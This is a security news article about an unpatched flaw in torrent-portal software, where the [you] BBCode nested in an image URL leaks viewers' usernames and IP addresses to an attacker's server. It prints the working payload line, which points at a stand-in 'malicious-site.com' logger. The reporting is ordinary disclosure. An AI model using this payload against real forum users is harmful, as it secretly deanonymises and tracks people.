HomeSecurityVulnerability in Torrent portal software exposes personal user information

Vulnerability in Torrent portal software exposes user personal information

An anonymous security researcher is sounding the alarm about a security flaw in a popular torrent portal website software that can be exploited to expose details about a website's users.

In terms of piracy and torrent news, the TorrentFreak is a place you'll want to check on a daily basis. Taking advantage of the blog's huge audience, a security researcher who didn't want to reveal his name contacted the website and revealed details about an exploit he had recently discovered.

The problem lies in a software package used by the website's torrent administrators to create their portals. The researcher declined to name the software package as the flaw has not yet been patched.

This software comes with support from BBcode (Bulletin Board Code), a system that replaces certain text formats with text, images, or other types of dynamic information.

According to the researcher, there is a flaw in one of the built-in BBCodes that the software package is in. The BBCode is [you], which, when used, prints the username.

The researcher discovered that by nesting the BBcode [you] inside an URL , it could log information about a website's users. The way to do this is as follows: [IMG]https://malicious-site.com/logger/[you].png [/IMG] (as shown in the image below).

BBcode

This combination shows a 1x1px transparent PNG image, loaded from the attacker's malicious website.

The researcher explained that an attacker or a law enforcement agency could register on torrent portals, open forum topics, or send a private message to users they want to target.

When the user accesses the thread or private message, the BBcode is automatically executed, loads the image and records the user's IP address on the attacker's server without the user even realizing that there was an image on the page.

Users who do not use VPNs or proxies to access torrent websites can connect via this technique and later be identified in log files, linking their real IP address to piracy-related activities.

As of today, the researcher told TorrentFreak that one of the affected sites is SceneAccess, a private torrent website.

Vulnerability in Torrent portal software exposes user personal information

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS